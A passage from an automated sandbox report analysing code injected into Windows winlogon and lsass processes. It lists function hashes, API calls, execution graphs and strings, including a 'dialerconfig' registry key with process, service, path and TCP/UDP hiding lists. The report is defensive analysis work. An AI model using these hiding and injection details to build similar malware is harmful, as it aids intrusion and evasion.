                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                          • Instruction ID: 7280c10e0cae733f7f1c51849b6d636f805c722406e6fb78c5a3adf1043b02e1
                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                          • Instruction Fuzzy Hash: 7D91D572648E5A85F7609F6597403FD2BB0B784BAAF144139DE0EB7794EB34C842E780
                                                          Function 000001FC6038253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                          • Instruction ID: d5022d8b010fb022a43fc001383637df660bdb192ffc841e438a42e8f0b0103f
                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                          • Instruction Fuzzy Hash: FA71F53624878A46E7249E269B443FA67B4F3C57A5F540076ED0EA3B89DA34CA44D380
                                                          Function 000001FC5FF99E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2608683993.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc5ff90000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction ID: 354c3c654a01f84e41368dc6bdedf246f1a959aa3204852d0c0cfa46194d8043
                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction Fuzzy Hash: 24615A32700B4A8AEB28DF65D6803ED77A1F344B88F054225EF5917BA8DB38E556D740
                                                          Function 000001FC60382330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                          • Instruction ID: 3884d7be107b27e0c1971237686efded4920c8f90b590f22e970d7c31e52632b
                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                          • Instruction Fuzzy Hash: 6A51F33228C78B81F624CA2AA3583FAA771F3C5761F440175DD5EA3B49DA39C904A7D0
                                                          Function 000001FC603926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                          • Instruction ID: 415b3efd7acee416b31e3a8c723434dd237075e6fb70be8e2b0fb8c9401658a0
                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                          • Instruction Fuzzy Hash: 7E419F32219E8586DB209F65EA443EAA7B0F7987A5F404031EE4DD7798EB3CC841D780
                                                          Function 000001FC603894A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                          • Instruction ID: d3732bd98bb333c68ac44c531411d276a1ca479a2fb0772eb790494934d36b2a
                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                          • Instruction Fuzzy Hash: 2A115B36209B8482EB218F15E5403A977E0F788BA5F194271EE8C57768EF3CC551CB40
                                                          Function 000001FC5FF97356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2608683993.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc5ff90000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                          • API String ID: 592178966-758928094
                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                          • Instruction ID: eed36ca82e1fb5f5885b435cfecf138e97996c3c41c9a5c19a3ab538af031c08
                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                          • Instruction Fuzzy Hash: E5E08671740B4A90DF068F25E9402E833E4DB5CB64F889232996C0A321FB38E1EAC341
                                                          Function 000001FC5FF973B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2608683993.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc5ff90000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: Locator'$riptor at (
                                                          • API String ID: 592178966-4215709766
                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                          • Instruction ID: 481fb3346f7c0b13a6ecb81513be2f86c6f94ee4acff4211d381bd85bf8e49ff
                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                          • Instruction Fuzzy Hash: 4FE08671740B4A90DF068F25E5401E873A0E75CB54F889232C95C0A321EB38E1E6C340
                                                          Function 000001FC60381BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                          • Instruction ID: 06a73a72ddb71ef27177f752bdb15d2623ae2647fdac72d2da3caf5b5754a205
                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                          • Instruction Fuzzy Hash: BF118F35646B4981EA04DB6AA6042B973B5FBC9FE2F184074DE4DA3765DE78C442E380
                                                          Function 000001FC60381268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                          • Instruction ID: cdc858db1865d98ed6c35d95918c7886cdc75c055f8059b322f270a1a0c3dd06
                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                          • Instruction Fuzzy Hash: 8BE03935642A0986EB04AB62D9083AA37E1EB89B66F048034890947361EF7D8499D7D0

                                                          Execution Graph

                                                          Execution Coverage:1.1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:125
                                                          Total number of Limit Nodes:13
                                                          execution_graph 14769 161c7371abc 14774 161c7371628 GetProcessHeap 14769->14774 14771 161c7371ad2 Sleep SleepEx 14772 161c7371acb 14771->14772 14772->14771 14773 161c7371598 StrCmpIW StrCmpW 14772->14773 14773->14772 14775 161c7371648 __std_exception_copy 14774->14775 14819 161c7371268 GetProcessHeap 14775->14819 14777 161c7371650 14778 161c7371268 2 API calls 14777->14778 14779 161c7371661 14778->14779 14780 161c7371268 2 API calls 14779->14780 14781 161c737166a 14780->14781 14782 161c7371268 2 API calls 14781->14782 14783 161c7371673 14782->14783 14784 161c737168e RegOpenKeyExW 14783->14784 14785 161c73718a6 14784->14785 14786 161c73716c0 RegOpenKeyExW 14784->14786 14785->14772 14787 161c73716ff RegOpenKeyExW 14786->14787 14788 161c73716e9 14786->14788 14790 161c7371723 14787->14790 14791 161c737173a RegOpenKeyExW 14787->14791 14830 161c73712bc RegQueryInfoKeyW 14788->14830 14823 161c737104c RegQueryInfoKeyW 14790->14823 14794 161c7371775 RegOpenKeyExW 14791->14794 14795 161c737175e 14791->14795 14796 161c73717b0 RegOpenKeyExW 14794->14796 14797 161c7371799 14794->14797 14799 161c73712bc 13 API calls 14795->14799 14801 161c73717d4 14796->14801 14802 161c73717eb RegOpenKeyExW 14796->14802 14800 161c73712bc 13 API calls 14797->14800 14803 161c737176b RegCloseKey 14799->14803 14804 161c73717a6 RegCloseKey 14800->14804 14805 161c73712bc 13 API calls 14801->14805 14806 161c7371826 RegOpenKeyExW 14802->14806 14807 161c737180f 14802->14807 14803->14794 14804->14796 14808 161c73717e1 RegCloseKey 14805->14808 14810 161c7371861 RegOpenKeyExW 14806->14810 14811 161c737184a 14806->14811 14809 161c737104c 5 API calls 14807->14809 14808->14802 14814 161c737181c RegCloseKey 14809->14814 14812 161c7371885 14810->14812 14813 161c737189c RegCloseKey 14810->14813 14815 161c737104c 5 API calls 14811->14815 14816 161c737104c 5 API calls 14812->14816 14813->14785 14814->14806 14817 161c7371857 RegCloseKey 14815->14817 14818 161c7371892 RegCloseKey 14816->14818 14817->14810 14818->14813 14841 161c7386168 14819->14841 14821 161c7371283 GetProcessHeap 14822 161c73712ae __std_exception_copy 14821->14822 14822->14777 14824 161c73711b5 RegCloseKey 14823->14824 14825 161c73710bf 14823->14825 14824->14791 14825->14824 14826 161c73710cf RegEnumValueW 14825->14826 14828 161c7371125 __std_exception_copy 14826->14828 14827 161c737114e GetProcessHeap 14827->14828 14828->14824 14828->14826 14828->14827 14829 161c737116e GetProcessHeap HeapFree 14828->14829 14829->14828 14831 161c7371327 GetProcessHeap 14830->14831 14832 161c737148a RegCloseKey 14830->14832 14838 161c737133e __std_exception_copy 14831->14838 14832->14787 14833 161c7371476 GetProcessHeap HeapFree 14833->14832 14834 161c7371352 RegEnumValueW 14834->14838 14836 161c73713d3 GetProcessHeap 14836->14838 14837 161c737141e lstrlenW GetProcessHeap 14837->14838 14838->14833 14838->14834 14838->14836 14838->14837 14839 161c73713f3 GetProcessHeap HeapFree 14838->14839 14840 161c7371443 StrCpyW 14838->14840 14843 161c737152c 14838->14843 14839->14837 14840->14838 14842 161c7386178 14841->14842 14844 161c737157c 14843->14844 14847 161c7371546 14843->14847 14844->14838 14845 161c7371565 StrCmpW 14845->14847 14846 161c737155d StrCmpIW 14846->14847 14847->14844 14847->14845 14847->14846 14848 161c737253c 14849 161c73725bb 14848->14849 14850 161c737261d GetFileType 14849->14850 14860 161c73727aa 14849->14860 14851 161c7372641 14850->14851 14852 161c737262b StrCpyW 14850->14852 14864 161c7371a40 GetFinalPathNameByHandleW 14851->14864 14853 161c7372650 14852->14853 14855 161c73726ff 14853->14855 14858 161c737265a 14853->14858 14857 161c7373844 StrCmpNIW 14855->14857 14855->14860 14862 161c7373044 4 API calls 14855->14862 14863 161c7371cac 2 API calls 14855->14863 14857->14855 14858->14860 14869 161c7373844 14858->14869 14872 161c7373044 StrCmpIW 14858->14872 14876 161c7371cac 14858->14876 14862->14855 14863->14855 14865 161c7371a6a StrCmpNIW 14864->14865 14866 161c7371aa9 14864->14866 14865->14866 14867 161c7371a84 lstrlenW 14865->14867 14866->14853 14867->14866 14868 161c7371a96 StrCpyW 14867->14868 14868->14866 14870 161c7373851 StrCmpNIW 14869->14870 14871 161c7373866 14869->14871 14870->14871 14871->14858 14873 161c7373076 StrCpyW StrCatW 14872->14873 14874 161c737308d PathCombineW 14872->14874 14875 161c7373096 14873->14875 14874->14875 14875->14858 14877 161c7371ccc 14876->14877 14878 161c7371cc3 14876->14878 14877->14858 14879 161c737152c 2 API calls 14878->14879 14879->14877 14880 161c737202c 14881 161c737205d 14880->14881 14882 161c7372173 14881->14882 14888 161c7372081 14881->14888 14889 161c737213e 14881->14889 14883 161c7372178 14882->14883 14884 161c73721e7 14882->14884 14898 161c7372f04 GetProcessHeap 14883->14898 14887 161c7372f04 9 API calls 14884->14887 14884->14889 14886 161c73720b9 StrCmpNIW 14886->14888 14887->14889 14888->14886 14888->14889 14891 161c7371bf4 14888->14891 14892 161c7371c8f 14891->14892 14893 161c7371c1b GetProcessHeap 14891->14893 14892->14888 14895 161c7371c41 __std_exception_copy 14893->14895 14894 161c7371c77 GetProcessHeap HeapFree 14894->14892 14895->14892 14895->14894 14896 161c737152c 2 API calls 14895->14896 14897 161c7371c6e 14896->14897 14897->14894 14903 161c7372f40 __std_exception_copy 14898->14903 14899 161c7373015 GetProcessHeap HeapFree 14899->14889 14900 161c7373010 14900->14899 14901 161c7372fa2 StrCmpNIW 14901->14903 14902 161c7371bf4 5 API calls 14902->14903 14903->14899 14903->14900 14903->14901 14903->14902 14904 161c734273c 14906 161c734276a 14904->14906 14905 161c7342858 LoadLibraryA 14905->14906 14906->14905 14907 161c73428d4 14906->14907

                                                          Executed Functions

                                                          Function 00000161C737253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 58 161c737253c-161c73725c0 call 161c7392cc0 61 161c73727d8-161c73727fb 58->61 62 161c73725c6-161c73725c9 58->62 62->61 63 161c73725cf-161c73725dd 62->63 63->61 64 161c73725e3-161c7372629 call 161c7378c60 * 3 GetFileType 63->64 71 161c7372641-161c737264b call 161c7371a40 64->71 72 161c737262b-161c737263f StrCpyW 64->72 73 161c7372650-161c7372654 71->73 72->73 75 161c73726ff-161c7372704 73->75 76 161c737265a-161c7372673 call 161c73730a8 call 161c7373844 73->76 77 161c7372707-161c737270c 75->77 90 161c7372675-161c73726a4 call 161c73730a8 call 161c7373044 call 161c7371cac 76->90 91 161c73726aa-161c73726f4 call 161c7392cc0 76->91 79 161c737270e-161c7372711 77->79 80 161c7372729 77->80 79->80 83 161c7372713-161c7372716 79->83 82 161c737272c-161c7372745 call 161c73730a8 call 161c7373844 80->82 100 161c7372787-161c7372789 82->100 101 161c7372747-161c7372776 call 161c73730a8 call 161c7373044 call 161c7371cac 82->101 83->80 86 161c7372718-161c737271b 83->86 86->80 89 161c737271d-161c7372720 86->89 89->80 94 161c7372722-161c7372727 89->94 90->61 90->91 91->61 102 161c73726fa 91->102 94->80 94->82 103 161c737278b-161c73727a5 100->103 104 161c73727aa-161c73727ad 100->104 101->100 122 161c7372778-161c7372783 101->122 102->76 103->77 107 161c73727b7-161c73727ba 104->107 108 161c73727af-161c73727b5 104->108 111 161c73727d5 107->111 112 161c73727bc-161c73727bf 107->112 108->61 111->61 112->111 115 161c73727c1-161c73727c4 112->115 115->111 117 161c73727c6-161c73727c9 115->117 117->111 119 161c73727cb-161c73727ce 117->119 119->111 121 161c73727d0-161c73727d3 119->121 121->61 121->111 122->61 123 161c7372785 122->123 123->77
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                          • Instruction ID: f0e1fd3543c89c08a84cf4690ba3c8fa3b57843d715cdd1ce32006fab1f68bca
                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                          • Instruction Fuzzy Hash: 1B71F4362407C1A5E724DE269E403FEA7B0F389B84F486026DD0A5BB8ADEB6C645C704
                                                          Function 00000161C737202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 124 161c737202c-161c7372057 call 161c7392d00 126 161c737205d-161c7372066 124->126 127 161c7372068-161c737206c 126->127 128 161c737206f-161c7372072 126->128 127->128 129 161c7372078-161c737207b 128->129 130 161c7372223-161c7372243 128->130 131 161c7372173-161c7372176 129->131 132 161c7372081-161c7372093 129->132 133 161c7372178-161c7372192 call 161c7372f04 131->133 134 161c73721e7-161c73721ea 131->134 132->130 135 161c7372099-161c73720a5 132->135 133->130 144 161c7372198-161c73721ae 133->144 134->130 139 161c73721ec-161c73721ff call 161c7372f04 134->139 137 161c73720a7-161c73720b7 135->137 138 161c73720d3-161c73720de call 161c7371bbc 135->138 137->138 141 161c73720b9-161c73720d1 StrCmpNIW 137->141 145 161c73720ff-161c7372111 138->145 152 161c73720e0-161c73720f8 call 161c7371bf4 138->152 139->130 151 161c7372201-161c7372209 139->151 141->138 141->145 144->130 150 161c73721b0-161c73721cc 144->150 148 161c7372113-161c7372115 145->148 149 161c7372121-161c7372123 145->149 154 161c7372117-161c737211a 148->154 155 161c737211c-161c737211f 148->155 156 161c7372125-161c7372128 149->156 157 161c737212a 149->157 158 161c73721d0-161c73721e3 150->158 151->130 159 161c737220b-161c7372213 151->159 152->145 164 161c73720fa-161c73720fd 152->164 162 161c737212d-161c7372130 154->162 155->162 156->162 157->162 158->158 163 161c73721e5 158->163 160 161c7372216-161c7372221 159->160 160->130 160->160 165 161c7372132-161c7372138 162->165 166 161c737213e-161c7372141 162->166 163->130 164->162 165->135 165->166 166->130 167 161c7372147-161c737214b 166->167 168 161c7372162-161c737216e 167->168 169 161c737214d-161c7372150 167->169 168->130 169->130 170 161c7372156-161c737215b 169->170 170->167 171 161c737215d 170->171 171->130
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: S$dialer
                                                          • API String ID: 756756679-3873981283
                                                          • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                          • Instruction ID: fe76ea5af763c147cbd8edfee0a8953b2f1b20b26f5c0b03e88992c10964a200
                                                          • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                          • Instruction Fuzzy Hash: 1D519B32B95A28A6EBA1CB26EE406FDA3F5F704784F09E015DF0522B85DFB6C851C344
                                                          Function 00000161C7371628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 106492572-2879589442
                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                          • Instruction ID: 56776d921502187d47caf7ab5dfb8979c7167d461919bfcac9ba555cf49bd391
                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                          • Instruction Fuzzy Hash: 4A710976350E10E6EB20DF65EC916ED63A4FB88B88F082112DE4E47B69DFBAC444C745
                                                          Function 00000161C7371A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                          • Instruction ID: f3148d1d4120f096ed071fdf6a54ca0266a550c9eab2ee5967ff047b98c1a424
                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                          • Instruction Fuzzy Hash: D0F04472344681E2E760CB21FDD47AD6760F788BC8F985021DA4946655DFBEC64DCB00
                                                          Function 00000161C737328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                          • Instruction ID: 72257fdc053cd2ebc420516a1ca704fcaa6f27ea985b87abf4101d70a5e4ad09
                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                          • Instruction Fuzzy Hash: DE11C472698AC0B2F770DB21FE443FDA294A744344F5C71259A5649591EFFBC0848604
                                                          Function 00000161C7371ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00000161C7371628: GetProcessHeap.KERNEL32 ref: 00000161C7371633
                                                            • Part of subcall function 00000161C7371628: HeapAlloc.KERNEL32 ref: 00000161C7371642
                                                            • Part of subcall function 00000161C7371628: RegOpenKeyExW.ADVAPI32 ref: 00000161C73716B2
                                                            • Part of subcall function 00000161C7371628: RegOpenKeyExW.ADVAPI32 ref: 00000161C73716DF
                                                            • Part of subcall function 00000161C7371628: RegCloseKey.ADVAPI32 ref: 00000161C73716F9
                                                            • Part of subcall function 00000161C7371628: RegOpenKeyExW.ADVAPI32 ref: 00000161C7371719
                                                            • Part of subcall function 00000161C7371628: RegCloseKey.ADVAPI32 ref: 00000161C7371734
                                                            • Part of subcall function 00000161C7371628: RegOpenKeyExW.ADVAPI32 ref: 00000161C7371754
                                                            • Part of subcall function 00000161C7371628: RegCloseKey.ADVAPI32 ref: 00000161C737176F
                                                            • Part of subcall function 00000161C7371628: RegOpenKeyExW.ADVAPI32 ref: 00000161C737178F
                                                            • Part of subcall function 00000161C7371628: RegCloseKey.ADVAPI32 ref: 00000161C73717AA
                                                            • Part of subcall function 00000161C7371628: RegOpenKeyExW.ADVAPI32 ref: 00000161C73717CA
                                                          • Sleep.KERNEL32 ref: 00000161C7371AD7
                                                          • SleepEx.KERNELBASE ref: 00000161C7371ADD
                                                            • Part of subcall function 00000161C7371628: RegCloseKey.ADVAPI32 ref: 00000161C73717E5
                                                            • Part of subcall function 00000161C7371628: RegOpenKeyExW.ADVAPI32 ref: 00000161C7371805
                                                            • Part of subcall function 00000161C7371628: RegCloseKey.ADVAPI32 ref: 00000161C7371820
                                                            • Part of subcall function 00000161C7371628: RegOpenKeyExW.ADVAPI32 ref: 00000161C7371840
                                                            • Part of subcall function 00000161C7371628: RegCloseKey.ADVAPI32 ref: 00000161C737185B
                                                            • Part of subcall function 00000161C7371628: RegOpenKeyExW.ADVAPI32 ref: 00000161C737187B
                                                            • Part of subcall function 00000161C7371628: RegCloseKey.ADVAPI32 ref: 00000161C7371896
                                                            • Part of subcall function 00000161C7371628: RegCloseKey.ADVAPI32 ref: 00000161C73718A0
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1534210851-0
                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                          • Instruction ID: 9e44dc2b8950a956838b5f11b08fc5e7787082141d4391e8250adeefb5bfad72
                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                          • Instruction Fuzzy Hash: 5131A973280A45A2FF54DB26DF913FDA3A5ABC8BD0F0C74219E0987695EFA6C851C210
                                                          Function 00000161C734273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
